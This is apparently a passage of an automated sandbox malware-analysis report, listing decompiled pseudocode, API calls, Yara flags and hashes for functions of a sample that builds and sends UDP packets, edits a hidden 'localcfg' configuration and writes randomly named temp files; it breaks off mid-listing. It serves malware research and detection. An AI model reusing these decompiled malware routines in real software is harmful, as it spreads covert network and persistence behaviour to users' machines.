                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                                                                  • String ID: /%d$|
                                                                                                                                  • API String ID: 676856371-4124749705
                                                                                                                                  • Opcode ID: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                                                                  • Opcode Fuzzy Hash: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406CC9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}









                                                                                                                                  0x00406cc9
                                                                                                                                  0x00406cd6
                                                                                                                                  0x00406dbe
                                                                                                                                  0x00406dc1
                                                                                                                                  0x00406dc1
                                                                                                                                  0x00406cee
                                                                                                                                  0x00406cfb
                                                                                                                                  0x00406d12
                                                                                                                                  0x00406d1c
                                                                                                                                  0x00406d40
                                                                                                                                  0x00406d60
                                                                                                                                  0x00406d69
                                                                                                                                  0x00406d6e
                                                                                                                                  0x00406d6e
                                                                                                                                  0x00406d86
                                                                                                                                  0x00406d8f
                                                                                                                                  0x00406d98
                                                                                                                                  0x00406d99
                                                                                                                                  0x00406d99
                                                                                                                                  0x00406d9e
                                                                                                                                  0x00406d9f
                                                                                                                                  0x00406d9f
                                                                                                                                  0x00406da1
                                                                                                                                  0x00406da4
                                                                                                                                  0x00000000
                                                                                                                                  0x00406da6
                                                                                                                                  0x00406da6
                                                                                                                                  0x00406daf
                                                                                                                                  0x00406db1
                                                                                                                                  0x00406db8
                                                                                                                                  0x00406db8
                                                                                                                                  0x00000000
                                                                                                                                  0x00406daf
                                                                                                                                  0x00406da4
                                                                                                                                  0x00406cfd
                                                                                                                                  0x00406cfe
                                                                                                                                  0x00406d03
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                                                                  • API String ID: 1082366364-3395550214
                                                                                                                                  • Opcode ID: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                                                                  • Opcode Fuzzy Hash: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E52A Relevance: 10.7, APIs: 7, Instructions: 238COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4168457693-0
                                                                                                                                  • Opcode ID: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
                                                                                                                                  • Instruction ID: 6c63f3ddf49572ac79c6d8e251c1f7650864198d5e2a559435b00663c8f182db
                                                                                                                                  • Opcode Fuzzy Hash: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
                                                                                                                                  • Instruction Fuzzy Hash: 25A181B1E002289BDB24DB46DC81BAEB374AB44308F54449AE6097B282D7786E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D487 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$0$9
                                                                                                                                  • API String ID: 3120068967-269856862
                                                                                                                                  • Opcode ID: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
                                                                                                                                  • Instruction ID: a00eee181b3eeb95df4b7ce26ca00e0e60aed49754cb2fdd6ab912959dcfa0b4
                                                                                                                                  • Opcode Fuzzy Hash: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
                                                                                                                                  • Instruction Fuzzy Hash: C441E4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E81CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004026FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 26%
                                                                                                                                  			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400);
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

























                                                                                                                                  0x00402704
                                                                                                                                  0x00402706
                                                                                                                                  0x0040270b
                                                                                                                                  0x00402715
                                                                                                                                  0x00402718
                                                                                                                                  0x0040271d
                                                                                                                                  0x0040271e
                                                                                                                                  0x0040271e
                                                                                                                                  0x00402726
                                                                                                                                  0x0040272e
                                                                                                                                  0x00402734
                                                                                                                                  0x0040273a
                                                                                                                                  0x00402740
                                                                                                                                  0x00402743
                                                                                                                                  0x0040274e
                                                                                                                                  0x00402752
                                                                                                                                  0x00402754
                                                                                                                                  0x0040275a
                                                                                                                                  0x0040275e
                                                                                                                                  0x00402764
                                                                                                                                  0x00402766
                                                                                                                                  0x0040276a
                                                                                                                                  0x00402770
                                                                                                                                  0x00402774
                                                                                                                                  0x0040277a
                                                                                                                                  0x0040277e
                                                                                                                                  0x00402784
                                                                                                                                  0x00402788
                                                                                                                                  0x0040278a
                                                                                                                                  0x0040278a
                                                                                                                                  0x0040278d
                                                                                                                                  0x004027a0
                                                                                                                                  0x00402795
                                                                                                                                  0x00402797
                                                                                                                                  0x0040279d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040279d
                                                                                                                                  0x00000000
                                                                                                                                  0x00402795
                                                                                                                                  0x004027a9
                                                                                                                                  0x004027ad
                                                                                                                                  0x004027b9
                                                                                                                                  0x004027b3
                                                                                                                                  0x004027b7
                                                                                                                                  0x004027b8
                                                                                                                                  0x004027b8
                                                                                                                                  0x004027c2
                                                                                                                                  0x004027c4
                                                                                                                                  0x004027c4
                                                                                                                                  0x004027c5
                                                                                                                                  0x004027c7
                                                                                                                                  0x0040278a
                                                                                                                                  0x004027ce
                                                                                                                                  0x004027d2
                                                                                                                                  0x004027d2
                                                                                                                                  0x004027d5
                                                                                                                                  0x004027d7
                                                                                                                                  0x004027df
                                                                                                                                  0x004027e3
                                                                                                                                  0x004027e5
                                                                                                                                  0x004027f0
                                                                                                                                  0x00402802
                                                                                                                                  0x00402815

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040272E
                                                                                                                                  • htons.WS2_32(00000001), ref: 00402752
                                                                                                                                  • htons.WS2_32(0000000F), ref: 004027D5
                                                                                                                                  • htons.WS2_32(00000001), ref: 004027E3
                                                                                                                                  • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                                                                    • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                                                                    • Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$Heap$AllocCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1802437671-3142137124
                                                                                                                                  • Opcode ID: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                                                                  • Opcode Fuzzy Hash: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E354 Relevance: 9.2, APIs: 6, Instructions: 222COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4186970751-0
                                                                                                                                  • Opcode ID: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction ID: f39460077ea95656aa980f8ee85ddbd5759fc33d01551210f6fb9fd778779053
                                                                                                                                  • Opcode Fuzzy Hash: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction Fuzzy Hash: 52A173B1E002289BDB24CF56DC817AEB7B5BB44305F5481DAE6096B281D7386E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E8A1 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

























                                                                                                                                  0x0040e8a1
                                                                                                                                  0x0040e8ac
                                                                                                                                  0x0040e8af
                                                                                                                                  0x0040e8b7
                                                                                                                                  0x0040e8c0
                                                                                                                                  0x0040e8c3
                                                                                                                                  0x0040e8c6
                                                                                                                                  0x0040e917
                                                                                                                                  0x0040e91a
                                                                                                                                  0x0040e932
                                                                                                                                  0x0040e93a
                                                                                                                                  0x0040e93a
                                                                                                                                  0x0040e943
                                                                                                                                  0x0040e947
                                                                                                                                  0x0040e94a
                                                                                                                                  0x0040e96a
                                                                                                                                  0x0040e96d
                                                                                                                                  0x0040e971
                                                                                                                                  0x0040e974
                                                                                                                                  0x0040e94c
                                                                                                                                  0x0040e94f
                                                                                                                                  0x0040e95c
                                                                                                                                  0x0040e95f
                                                                                                                                  0x0040e962
                                                                                                                                  0x0040e965
                                                                                                                                  0x0040e965
                                                                                                                                  0x0040e979
                                                                                                                                  0x0040ea3a
                                                                                                                                  0x0040ea4f
                                                                                                                                  0x0040ea59
                                                                                                                                  0x0040ea5d
                                                                                                                                  0x0040ea68
                                                                                                                                  0x0040ea6a
                                                                                                                                  0x0040ea6d
                                                                                                                                  0x0040ea6d
                                                                                                                                  0x0040e97f
                                                                                                                                  0x0040e985
                                                                                                                                  0x0040e98f
                                                                                                                                  0x0040e994
                                                                                                                                  0x0040e9a1
                                                                                                                                  0x0040e9a6
                                                                                                                                  0x0040e9b8
                                                                                                                                  0x0040e9c0
                                                                                                                                  0x0040e9c7
                                                                                                                                  0x0040e9dd
                                                                                                                                  0x0040ea02
                                                                                                                                  0x0040ea0c
                                                                                                                                  0x0040ea16
                                                                                                                                  0x0040ea19
                                                                                                                                  0x0040ea22
                                                                                                                                  0x0040ea28
                                                                                                                                  0x0040ea28
                                                                                                                                  0x0040e994
                                                                                                                                  0x0040ea77
                                                                                                                                  0x0040ea77
                                                                                                                                  0x0040ea83
                                                                                                                                  0x0040ea83
                                                                                                                                  0x0040e8d1
                                                                                                                                  0x0040e8d4
                                                                                                                                  0x0040e8d7
                                                                                                                                  0x0040e8de
                                                                                                                                  0x0040e8ea
                                                                                                                                  0x0040e8ed
                                                                                                                                  0x0040e8f5
                                                                                                                                  0x0040e8fc
                                                                                                                                  0x0040e90a
                                                                                                                                  0x0040e90c
                                                                                                                                  0x0040e911
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                    • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                                                                  • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                                                                  • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                                                                  • String ID: flags_upd$localcfg
                                                                                                                                  • API String ID: 204374128-3505511081
                                                                                                                                  • Opcode ID: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
                                                                                                                                  • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                                                                  • Opcode Fuzzy Hash: a8706cbe59c11349abe89667f011435cb075cce9c025d7d828ab42ec1d016fb1
                                                                                                                                  • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406BA7 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                  			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}









                                                                                                                                  0x00406bab
                                                                                                                                  0x00406bba
                                                                                                                                  0x00406bc4
                                                                                                                                  0x00406bc7
                                                                                                                                  0x00406bd2
                                                                                                                                  0x00406be4
                                                                                                                                  0x00406be9
                                                                                                                                  0x00406c03
                                                                                                                                  0x00406c03
                                                                                                                                  0x00406beb
                                                                                                                                  0x00406bee
                                                                                                                                  0x00406bef
                                                                                                                                  0x00406bfa
                                                                                                                                  0x00406c1a
                                                                                                                                  0x00406c23
                                                                                                                                  0x00406c28
                                                                                                                                  0x00406c3e
                                                                                                                                  0x00406c44
                                                                                                                                  0x00406c47
                                                                                                                                  0x00406c5a
                                                                                                                                  0x00406c61
                                                                                                                                  0x00406c66
                                                                                                                                  0x00406c49
                                                                                                                                  0x00406c49
                                                                                                                                  0x00406c52
                                                                                                                                  0x00000000
                                                                                                                                  0x00406c52
                                                                                                                                  0x00406c2a
                                                                                                                                  0x00406c2a
                                                                                                                                  0x00406c2b
                                                                                                                                  0x00406c30
                                                                                                                                  0x00406c30
                                                                                                                                  0x00406bfc
                                                                                                                                  0x00406bfd
                                                                                                                                  0x00000000
                                                                                                                                  0x00406c02
                                                                                                                                  0x00406bfa
                                                                                                                                  0x00406bd4
                                                                                                                                  0x00406bd4
                                                                                                                                  0x00406bd4
                                                                                                                                  0x00406c6e
                                                                                                                                  0x00406bbc
                                                                                                                                  0x00406bbf
                                                                                                                                  0x00406bbf

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3609698214-0
                                                                                                                                  • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                                                                  • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409064 Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








                                                                                                                                  0x0040907b
                                                                                                                                  0x00409088
                                                                                                                                  0x0040908e
                                                                                                                                  0x00409095
                                                                                                                                  0x0040909c
                                                                                                                                  0x004090a8
                                                                                                                                  0x004090b4
                                                                                                                                  0x004090c9
                                                                                                                                  0x004090ca
                                                                                                                                  0x004090e9
                                                                                                                                  0x004090f8
                                                                                                                                  0x00409114
                                                                                                                                  0x00409118
                                                                                                                                  0x00000000
                                                                                                                                  0x0040913f
                                                                                                                                  0x0040912d
                                                                                                                                  0x00409134
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
